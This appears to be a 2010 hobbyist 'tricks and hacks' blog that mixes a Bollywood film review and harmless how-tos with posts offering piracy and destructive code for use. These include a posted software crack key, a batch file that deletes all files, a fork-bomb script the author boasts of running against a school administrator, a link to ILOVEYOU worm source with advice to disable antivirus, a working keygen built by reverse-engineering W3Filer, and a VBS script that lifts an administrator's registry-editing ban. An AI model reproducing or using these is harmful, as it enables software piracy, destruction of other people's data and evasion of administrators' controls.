This is default featured slide 1 title

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. blogger theme by BTemplates4u.com.

This is default featured slide 2 title

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. blogger theme by BTemplates4u.com.

This is default featured slide 3 title

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. blogger theme by BTemplates4u.com.

This is default featured slide 4 title

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. blogger theme by BTemplates4u.com.

This is default featured slide 5 title

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. blogger theme by BTemplates4u.com.

Sunday, February 28, 2010


Teen Patti begins with Venkat Subramanium (Amitabh Bachchan) invited to the presitigious Cambridge University by Mathematics genius Perci Trachtenberg (Sir Kingsley). On meeting, Venkat an eccentric mathematics scholar himself narrates his personal tale of his invented theory and his tryst with the gambling world while using it. Venkat narrates how after writing a thesis on the theory of Probability his seniors didn’t agree with his theory. But when he plays an online game of cards of Teen Patti, he realises that his theory is right. He immediately shares it with his junior professor Shantanu (R Madhavan). In order to verify the theory, the two rope in their three students Aparna aka Apu (Shraddha Kapoor), Sid (Siddharth Kher) and Bikram (Dhruv). They all go to a casino and try their hand at the game. They play the game employing the theory and win it. But soon greed comes in and other emotions follow, which gets them all into trouble. An unknown blackmailer starts calling Subramanium and demanding a big share in the money they make from their games. The blackmailer even starts dictating which games they should play next. A richie rich student Abbas (Vaibhav) too joins the group. Subramanium starts suspecting the blackmailer to be one amongst his group members but soon a situation arises where he gets convinced its none of them but someone else who is playing the game on him. What happens next makes up for the film.



The first thing that came to mind when the promos Teen Patti came was is it inspired from 21. But well though there are a few similarities, one can say that it’s a completely different film. Teen Patti is lavishly mounted and with the kind of subject it deals in is presented with intricate detail. In short, it is not your average Bollywood fare. But the confusing application of the theory of probability with the game of Teen Patti is definitely all set to go above many a viewers head. While the first half is lot of things happening and keeping you at the edge of the seat with the intriguing happenings, the second half is where it loses its steam big time. Repetitiveness, unimpressive cameos by Ajay Devgan, Saira Mohan, confused narrative and a pro longed climax brings the graph of the film completely down. Also the talk-a-thon between Bachchan and Kingsley seems to be never ending and at times even acts a spoke in the wheel of the narrative. However, the edgy moments in the first half have turned up really well, especially the group’s first tryst with Teen Patti at a gambling den amongst real Bhais.
Amitabh Bachchan is simply superb as the eccentric professor. Madhavan with a tinge of grey shade to his character is just excellent. Raima Sen playing his fiancée however gets no scope. Shakti Kapoor’s debutante daughter Shraddha Kapoor impresses. The talented newcomer surely will go a long way. Amongst the male newcomers all three – Vaibhav, Dhruv and Siddharth have good screen presence and talent to match. There are cameos by Ajay Devgan, Saira Mohan, Jackie Shroff, Shakti Kapoor with the most impressive one being by Mahesh Manjrekar. Sir Ben Kingsley is just first rate.




Camerawork by Aseem Bajaj matches international standards. Aarti Bajaj’s editing work however makes the film more confusing than it should have been. Salim-Suleiman’s music barring the Neeyat song featuring Brazilian hottie Mariah is nothing much to write about.
Teen Patti is a hatke experience which is no harm in trying provided you are willing to be a little patient with its second half.
 

by - Sampurn

Saturday, February 27, 2010

Total Video Converter (Fully Cracked) Download

Want to play movies and other clips on mobile. You need a converter to convert it to 3Gp format or any other mobile supported format

Total video conveter is the converter software which convert the format .avi .mpeg .wmi .vob .mp3 .flv and many more formats to .3gp .avi .mpeg which are supported by the mobile phone.




Also you can compress audio from mp3 To rm And vice versa Also it convers mp3 to amr,ogg,itunes,rm and many more formats

The crack is been publish here so you need to download the video converter and register using the crack given below and enjoy movies on your mobile

Download Total video Converter

Crack: 0ab52023-ba00347e-9fa86acd-fdc330a9-68578b7e-264b81e1-30bdfeef-cea403fa-20457e4a-39c03409-f69a9aba-388e8a94-677044c7-643fe9ac-66523c91-18a61801

Download and register with crack given above ;-)

Friday, February 26, 2010

Install Linux and Windows in same Folder



Friends as we know that to install linux we need to create a separate partition of windows logical drive which is empty and so we need to format a logical drive before use.

So what about if the linux can be install on the same logical partion where windows is install and without harming or deleting any windows content.

You think this is not possible but my 
friend you are wrong this time it is possible.

The reason is that when we try to install Linux from a linux setup in the same partition where windows is install then it will not detect any windows data and overwrite its data on important *.dll system files of windows. Hence windows will crash and you will not be able to boot windows.

This happens due to the installer of linux is not capable of detecting windows. So if a installer of linux is there which detect windows then the above problem can be solved and so here I have found the solution which is 100% working and very useful.


Now you have an easy-to-use tool for installing Ubuntu linux into your PCs without disturbing your Windows installation.


One of the latest releases by Ubuntu, Wubi can do it for you. With Wubi you can install or uninstall Ubuntu on Windows in same folder.


That implies you don't need partitioning for installation.
Wubi is a Windows application which runs in windows environment and can be downloaded for free here.


The installation can be accomplished without re-partitioning of the drive and there is no risk for wiping out of existing data.


Requirements:


Certain requirements you need to meet before installation.


1) Ensure that you download the right version of Wubi for Ubuntu installation


2) If you are using a disc, make sure it's a standard desktop version of Ubuntu.


3) You need to have - 256 MB memmory, 5 GB harddisk space and Windows 98, 2000, XP, Vista.

Steps to install UBHUNTU linux in Windows partition.


Follow the steps below for installation


1) Copy ISO setup of ubhuntu with Wubi executable in one folder.

2) Double 
click the Wubi executable. The installer will detect the ISO file and installation starts.

3) Windows will ask you to enter the admin username and password for the windows. Enter them and remember them as you would need them to enter the distribution.

4) When prompted, enter the size that you want to allocate for the distribution on the hard drive. Also 
choose the location where you want to install the Ubuntu.

When you are done with the above step, a folder will be created in its place having the necessary partitions as files in it.


5) Now click on the install to start the installation.

When the installation is complete reboot your system. You will find an option for booting into Ubuntu.

Now that you are done with the installation.

Uninstalling Ubuntu.

Later on, if you decide that Ubuntu isn't meant for you, uninstall it.

Uninstalling Ubuntu is pretty much same as uninstalling any other Windows application.
Here are the steps to Uninstall Ubuntu.

1) After booting into Window, click on the Start button

2) Enter the Control Panel and 
select the Add/Remove Programs option.

3) Click on the Ubuntu and then click on the Change/Remove

4) Click on the Uninstall.
Once you are over with it Ubuntu will be removed from your computer.

I think you are done with the UBUNTU linux installation from windows in windows partition.



Thursday, February 25, 2010

You can generate thousands of Crack with a single go...

ZCRACK is a site that gives you an opportunity to download cracks and serials for miscellaneous software products. You can make crack download on this site without any probles and fees. Crack sites often contain different kind of adware. Be sure this site is absolutely free of any kind of adware, exploits, porn popups etc.Nothing will prevent you from downloading cracks and serials.


After crack download you will get an archive (zip or rar), unpackit and just apply to a specific software or application.

All cracks are absolutely free, that means that you don`t have to pay money for crack and crack download. NOBODY gets profit from 
crack download or crack creating. Crack download is simple way to access program that you can`t buy, but remeber if you like this software don`t make crack download - BUY THIS SOFTWARE )



[Courtesy : www.zcrack.com]

Delete all files



This is the virus wirting basics section. Today we are going to show you how to delete all content. This is demonstrated using DOS programming and also in LINUX.

DOS programming

Paste the given code in notepad


@Echo off

Del C:\ *.*y



And save it like any_name.bat . Now run this file... All the data is gone from your PC.

LINUX

Just run the command
rm *.* will delete all files of any extension. This is the code of the "Black Wolf" virus.This is in c.
This virus corrupts all the .com files . so be extremely careful what you do with it.

Tuesday, February 23, 2010

Heard about FORK BOMB Virus (Rabbit Virus)??? Now learn how to make it ;-)



Hey guys, I ‘ve got a new thing for all u guys to have fun with, its very easy and fun to do. Before we start coding ill explain what a fork bomb actually is.
A fork bomb or rabbit virus opens an application bar. For example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (Blue Screen of Death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.
Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.
Background
Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virussoftware. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don’t bomb yourself.
The code
Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt
One more thing…I am not responsible if you kills your computer or somebody else computer with or without permission. Now that we have that out a the way here we go…
Blocks of code should be set as style “Formatted” like this.
:s
START %0
GOTO :s

Saturday, February 20, 2010

The ILOVEYOU WORM - Have your own VIRUS

The ILOVEYOU worm, also known as VBS/Loveletter and Love Bug worm, is a computer worm written in VBScript.
-------------------------------------------------------------------------
Description

The worm arrived in e-mail boxes on May 4, 2000, with the simple subject of ``ILOVEYOU`` and an attachment ``LOVE-LETTER-FOR-YOU.TXT.vbs``.

Two aspects of the worm made it effective:

* It relied on social engineering to entice users to open the e-mail and ensure its continued propagation.
* It employed a mechanism — VBScripts — that, while not entirely novel, had not been exploited to such a degree previously to direct attention to their potential, reducing the layers of protection that would have to be navigated for success.


here is the source code of one of the most famous virus the hits cyberspace

NOTE : THIS IS ONLY FOR EDUCATIONAL PURPOSE.  Moreover it is easily scaned by Anti-Virus so when ever you are trying please turn-off your antivirus.

Download Notepad file from : http://saeaset.com/ILOVEYOU-WORM.txt

Tuesday, February 16, 2010

Branding Windows Xp with your Name and Details.

Many of you wish someday you have your own Operating System Well that's good but until you can't have your own windows, why not branding your name instead of Windows.




Open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:


     [General]
     Manufacturer=Your Name Here
     Model=Your Model Here
     [Support Information]
     Line1=Your Name Here
     Line2=Your Address Here
     Line3=Your Email Address Here


Save the file, then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.




Now if you want to display some more information then simply increase the line in the file.
eg: Line4=Your Working Hours Here


Enjoy your own created version of windows.....:-)

Saturday, February 13, 2010

How to make key generators?

How to make key generators?
-===========================-
Introduction
------------
I take no responsibility of the usage of this information.
This post, is for educational knowledge ONLY.


Hi there, in this post, I intend to teach you how to make a pretty simple keygen, of a program called W3Filer 32 V1.1.3.
W3Filer is a pretty good web downloader...I guess some of you might know the program.

I`ll assume you know:
A.How to use debugger (in this case, SoftIce).
B.How to crack, generally (finding protection routines,patching them,etc...).
C.How to use Disassembler.
D.Assembly.
E.How to code in Turbo Pascal (tm).


Tools you`ll need:
A. SoftIce 3.00/01 or newer.
B. WD32Asm. (Not a must).
C. The program W3Filer V1.13  can be found in www.windows95.com I believe.
D. Turbo Pascal (ANY version).

Well, let's go cracking...
Run W3Filer 32.
A nag screen pops, and , demands registration (Hmm, this sux ;-)) Now, We notice this program has some kind of serial number (Mine is 873977046), Let's keep the serial in mind, I bet we`ll meet it again while we're on the debugger.
Well, now, let's put your name and a dummy reg code...set a BP on GetDlgItemTextA, and, press OK.
We pop inside GetDlgItemTextA, Lets find the registration routine...I`ll save you the work, the registration routine is this:
:00404DB2 8D95A8FAFFFF lea edx, dword ptr [ebp+FFFFFAA8]
:00404DB8 52 push edx ---> Your user name here.
:00404DB9 E80B550000 call 0040A2C9 ---> Registration routine.
:00404DBE 83C408 add esp, 00000008 ---> Dunno exactly what is it.
:00404DC1 85C0 test eax, eax ---> Boolean identifier, 0 if
:00404DC3 7D17 jge 00404DDC ---> registration failed, 1 if
OK.
Well, Let's enter the CALL 40A2C9, and see what's inside it:
(Please read my comments in the code).
* Referenced by a CALL at Addresses:
|:00404DB9 , :00407F76
|
:0040A2C9 55 push ebp
:0040A2CA 8BEC mov ebp, esp
:0040A2CC 81C4B0FEFFFF add esp, FFFFFEB0
:0040A2D2 53 push ebx
:0040A2D3 56 push esi
:0040A2D4 57 push edi
:0040A2D5 8B5508 mov edx, dword ptr [ebp+08]
:0040A2D8 8DB500FFFFFF lea esi, dword ptr [ebp+FFFFFF00]
:0040A2DE 33C0 xor eax, eax
:0040A2E0 EB16 jmp 0040A2F8
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A2FB(C)
|
:0040A2E2 0FBE0A movsx ecx, byte ptr [edx] ----> Here Starts the interesting part.
:0040A2E5 83F920 cmp ecx, 00000020 ----> ECX is the the current char in the user name, Hmm, 20h=' '...
:0040A2E8 740D je 0040A2F7 ----> Let's see,
:0040A2EA 8A0A mov cl, byte ptr [edx] ----> Generally, all this loop does, is copying the user name from
[EDX], to [ESI], WITHOUT the spaces!
(Keep this in mind! ).
:0040A2EC 880C06 mov byte ptr [esi+eax], cl
:0040A2EF 42 inc edx
:0040A2F0 40 inc eax
:0040A2F1 C6040600 mov byte ptr [esi+eax], 00
:0040A2F5 EB01 jmp 0040A2F8
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A2E8(C)
|
:0040A2F7 42 inc edx
* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:0040A2E0(U), :0040A2F5(U)
|
:0040A2F8 803A00 cmp byte ptr [edx], 00
:0040A2FB 75E5 jne 0040A2E2 ----------------> This is the loop , we got what it does, Let's continue tracing the code...
:0040A2FD 56 push esi --------> The user name is pushed, in order to Upcase it's chars.
* Reference To: USER32.CharUpperA, Ord:0000h
|
:0040A2FE E80F330000 Call User!CharUpper ---> After this, our name is in upper case.
:0040A303 56 push esi -----> Our name in upper case here.
* Reference To: cw3220mt._strlen, Ord:0000h
|
:0040A304 E86F300000 Call 0040D378 ---> This is the length of our name.
:0040A309 59 pop ecx
:0040A30A 8BC8 mov ecx, eax ---> ECX=Length.
:0040A30C 83F904 cmp ecx, 00000004 ---> Length>=4 (MUST).
:0040A30F 7D05 jge 0040A316 ---> Let's go to this address...
:0040A311 83C8FF or eax, FFFFFFFF
:0040A314 EB67 jmp 0040A37D
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A30F(C)
|
:0040A316 33D2 xor edx, edx
:0040A318 33C0 xor eax, eax
:0040A31A 3BC8 cmp ecx, eax
:0040A31C 7E17 jle 0040A335 ---> (Not important, just another useless checking).

================================================

 FROM HERE AND ON, THE IMPORTANT CODE, ATTENTION
================================================

One thing before we continue, EDX = 00000000h as we enter to the next instructions.
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A333(C)
|
:0040A31E 0FBE1C06 movsx ebx, byte ptr [esi+eax] ---> EBX <--- char in user
name, offset EAX.
:0040A322 C1E303 shl ebx, 03 -----> Hmm, it shl's the char by 03h...(Remember that).
:0040A325 0FBE3C06 movsx edi, byte ptr [esi+eax] ---> Now EDI <--- Char in user name , offset EAX.
:0040A329 0FAFF8 imul edi, eax -----> It multiplies the char by the offset in user name! Remember that).
:0040A32C 03DF add ebx, edi -----> Adds the result to EBX (That was Shelled (Ding Dong =)).
:0040A32E 03D3 add edx, ebx -----> EDX=EDX+EBX!!! - This is the CORE of this registration routine!!!
:0040A330 40 inc eax -----> Increase EAX by one (next char).
:0040A331 3BC8 cmp ecx, eax
:0040A333 7FE9 jg 0040A31E ----> If ECX 
loop.
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A31C(C)
|
:0040A335 A120674100 mov eax, dword ptr [00416720] ---> HMMMMMM, What's in here????
:0040A33A C1F803 sar eax, 03 ---------> WAIT! Please type in SIce '?
EAX'
Does this number in EAX look familiar to us? ;-) 

If you still don`t understand, than, It's our SERIAL NUMBER! (PLEASE, take
your time, and check by yourself - don`t trust me!). OK,
so now we know, That it SHR's EAX by 03 (SAR is
almost identical to SHR).
:0040A33D 03D0 add edx, eax ---------> Hmm, it adds the result from the loop, the serial number shr'd by 03h
:0040A33F 52 push edx -------> Let's continue. (At this point, I can tell you , the reg number, is in EDX - only that the reg number is in HEX --> That's how you enter it).
* Possible StringData Ref from Data Obj ->"%lx"
|
:0040A340 685EF54000 push 0040F55E
:0040A345 8D95B0FEFFFF lea edx, dword ptr [ebp+FFFFFEB0]
:0040A34B 52 push edx
* Reference To: USER32.wsprintfA, Ord:0000h
|
:0040A34C E8E5320000 Call 0040D636 -------> This one, does HEX2STR (Takes the value from EDX, and turns it to an hex string).
:0040A351 83C40C add esp, 0000000C
:0040A354 8D8DB0FEFFFF lea ecx, dword ptr [ebp+FFFFFEB0] -----> type 'd ecx' -
THIS is the reg number! That's enough for us, the rest of the code, is just for comparing the correct reg code with ours.
:0040A35A 51 push ecx
* Reference To: USER32.CharLowerA, Ord:0000h
|
:0040A35B E8B8320000 Call 0040D618
:0040A360 8D85B0FEFFFF lea eax, dword ptr [ebp+FFFFFEB0]
:0040A366 50 push eax
:0040A367 FF750C push [ebp+0C]
* Reference To: cw3220mt._strcmp, Ord:0000h
|
:0040A36A E875300000 Call 0040D3E4
:0040A36F 83C408 add esp, 00000008
:0040A372 85C0 test eax, eax
:0040A374 7405 je 0040A37B
:0040A376 83C8FF or eax, FFFFFFFF
:0040A379 EB02 jmp 0040A37D
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A374(C)
|
:0040A37B 33C0 xor eax, eax
* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:0040A314(U), :0040A379(U)
|
:0040A37D 5F pop edi
:0040A37E 5E pop esi
:0040A37F 5B pop ebx
:0040A380 8BE5 mov esp, ebp
:0040A382 5D pop ebp
:0040A383 C3 ret

Making the actual Keygen
~~~~~~~~~~~~~~~~~~~~~~~~
Now, after I've explained how does the program calculate the registration code, you can either write your own keymaker, without looking at my code, or look at my code (in Turbo Pascal - sorry for all you C lovers ;-) Next time). That's it, here's the source of my keygen:



------------------- Cut here --------------------------
Program W3FilerKeygen;
var
Key,SerialNum,EB,ED,digit:Longint;
I,x:Byte;
Name,KeyHex:String;
begin
Writeln(' W3Filer32 V1.1.3 Keymaker');
writeln('Cracked by ^pain^ ''97 / Rebels!');
Write('Your Name:'); { Read the name }
readln(Name);
Write('Serial Number:');
readln(SerialNum); {Yes, we need the serial number for the calculation!}
Key:=0;
x:=0;
For I:=1 to length(Name) do
begin
Name[I]:=upcase(Name[i]);
If Name[I]<>' ' then begin
eb:=ord(Name[I]) shl 3; {EB = Name[I] Shl 03h}
Ed:=ord(Name[I]); {ED = Name[I]}
ed:=ed*(x); {ED=ED*Offset}
inc(x);
eb:=eb+ed; {Add ED to EB}
Key:=Key+EB; {Add EB to KEY}
end;
end;
Key:=Key+(SerialNum shr 3); { Add SerialNum shr 03h to Key}
{ From here, this is just HEX2STRING --> I`m quite sure it's
Self explaintory, else - go and learn number bases again! ;-)}
KeyHex:='';
repeat
digit:=Key mod 16;
key:=key div 16;
If digit<10 then KeyHex:=Chr(Digit+ord('0'))+KeyHex;
If digit>10 then KeyHex:=Chr(Digit-10+ord('a'))+KeyHex;
until key=0;
writeln('Your Key:',KeyHex);
writeln(' Enjoy!');
end.


[Note : This post is originally posted by Rahul Dutt Avasthy]

Friday, February 12, 2010

How to check whether your friend in the 'Invisible' mode in yahoo or Offline

Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline,they may in the 'Invisible' mode.This maybe if they are trying to ignore you or are too busy to talk to anyone.

There is this small trick that you can use to find out what the truth is.

Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check.The chat window will open obviously.

Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities

1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .See in the picture below:





2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page like in the picture below.So you know that the user is online.







Thursday, February 11, 2010

Want To Corrupt System Files

To make changes, modification etc. in system files you need to have full control on regedit. But whenever i open regedit ,it shows it has been disabled by your administrator. Many of you face this problem so I decided to come up with a solution. I've found a Script to solve this problem and gives you the access to bring modification in registry ;-) 





Here's the script :-

'Enable Registry Editing'
'© PsyhcoCoding - 12/02/2010
'This code may be freely distributed/modified
On Error Resume Next
'Prevents errors from values that don't exist
Set WshShell = WScript.CreateObject("WScript.Shell")
'Delete DisableRegistryTools registry values

WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
WshShell.RegDelete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"

'display message
Message = "Hey i m PsychoCoding. You should have access to Regedit now"

X = MsgBox(Message, vbOKOnly, "Done")
Set WshShell = Nothing
Set fso = Nothing



Save the above script as "Anyname.vbs" in notepad.

Wednesday, February 10, 2010

Save Electricity Using Firefox Auto Shutdown Add-on

Firefox is one of  the top most world widely used web browser. Because it is handy and have lots of features though its add-on and extension. Sometimes we download files using Firefox and on the same time we need to go for some work. So until we come back the computer waste the energy. In this situation we can use Firefox Auto shutdown the computer when downloads are completed and helps us to save electric power.



Auto Shutdown is a cool Firefoxadd-on which controls your active download and shut down the computer when downloads are completed through is auto executing user script. Not only this but ifFirefox is running idle it also shut downs the pc automatically with pre defined shut down time.



If you are using Downthemall Firefox extension for downloading movies , video, music and images from web then you can easily integrate Auto shutdown Firefox extension with downthemall add-on.

Tuesday, February 9, 2010

Make Your Keyboard Lights Do DISCO

Yesterday, I was just searching the web and I got something very cool trick to make your ordinary Keyboard into Disco Keyboard. You don't believe me then you need to check this out.


This trick just makes your keyboard lights go crazy and do disco. 
The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way! (Although it's not mine, but it's sexy)



1.This piece of code makes ur keyboard a live disco..
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

2.This one makes it looks like a chain of light….
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 200
wshshell.sendkeys "{CAPSLOCK}"
wscript.sleep 100
wshshell.sendkeys "{NUMLOCK}"
wscript.sleep 50
wshshell.sendkeys "{SCROLLLOCK}"
loop

Instructions:
*paste any of the two above codes in notepad
*Save as
 “AnyFileName”.vbs
*Run the file
*To stop, launch task manager and then under “
Processes” end “wscript.exe

[Note : This trick was originally posted by Bhanu Chawla]

Monday, February 8, 2010

How safe are you on Facebook ?


Facebook is the world’s number one social networking website that is operated and privately owned by Facebook, Inc. In September, the website has surpassed the 300 million active user mark and has reported positive cash flow last month.

On Facebook, users can load third-party applications, which are the simple widgets that are adding sparkle to friends' profiles. After the user is allowed to install the widgets, these apps are displayed as small icons on the profile. Players are invited to play, add personality features to the apps or perform a small task on the widgets.



Security Concerns

According to various security experts, the applications of the Facebook had been compromised by malicious hackers many times, however impact had been minimal. To the height of disappointment, the applications integrated in Facebook facilitates the ease of hacking due to some inbuilt malicious codes, cited security experts.

In another research, analysts searched Facebook apps for security vulnerabilities and found that out of top ten applications, six were hacked and around 9700 applications were infected, which affects about 218 million users.

Hacked apps forces Malicious Software to users
The Facebook apps had been hacked by the use of "iframes," which places another HTML document in a frame inside a normal HTML document. It is reported that these iframes can add content from other malicious websites into the Facebook’s applications that directs app users to install software by misguiding them to download a software update. Further, it is found that these iframes had been injected into the apps' code due to infected software on the developers' PCs.

The social website has taken compulsory steps for controlling the situation and contacted the developers to warn about the issue. However, the vulnerability in the Facebook’s applications are rare, but security researcher had made some disturbing findings.

Is Any App Safe?

Recently, Facebook users have discovered that on various quiz apps, they are providing vast amounts of personal information on the networking site. Also, the personal information can be available to other user, who is also playing with you. Further, Facebook does not evaluate the reliability of the developers for any privacy policy. Hence, after seeing the hacked apps, security vulnerabilities, lack of privacy policies and open personal information in quizzes, users will wonder how safe these apps now-a-days are.



What user can do?

Before going for a quiz or sending a virtual gift, user must watch different security issues with these social sites. In 2007, Facebook had adopted open innovation for application developers by releasing Facebook Platform. But, these apps are now putting user’s privacy on the stake. However, a user can actively take some precautions:

1.) Do not publish your personal information on the site.
2.) Use all the privacy settings offered by Facebook.
3.) You must verify a friend's identity before accepting any friend’s request.

Sunday, February 7, 2010

Keep away your parents from reading your private messages

We may often borrow the phone to our friend. And it is not strange if many people are often confused at the time will use their mobile phone, the phone or mobile phone battery is low. While on the one hand, he should do the communication such as SMS, or make a phone call. Usually we do is borrow the phone to a friend that happens is not in use. But often when we lend for phone, personal documents we often accidentally opened by other people.

At the time no friend to borrow the phone such as SMS, mobile phone owners are certainly not want information or an SMS message that is read by the time the person who borrowed the phone. But you do not need to worry, because at this time there is a free application that you can try to be your personal SMS can not be opened by other people. SMS is particularly easy to open and the access by other people. Active lock SMS is one of such application. 




The benefits of Active lock SMS is the ability to protect SMS messages using a password. If you use this application on your phone, then people will not be able to open the SMS you, because it is protected with a password, which only you alone can open a password. The default password for this application is 12345. However, at the time you want to use this application for the first time, you must enter the default password, and then change in accordance with the password you want.

Some other advantages in this application include a menu interface is very easy to use, the ability to upload data from a mobile phone SMS, such as inbox, my folders, drafts, sent, and also the outbox. If you want to use the application you can download on the site http://handheld.softpedia.com/progDownload/Active-SMS-Lock-Download-76488.html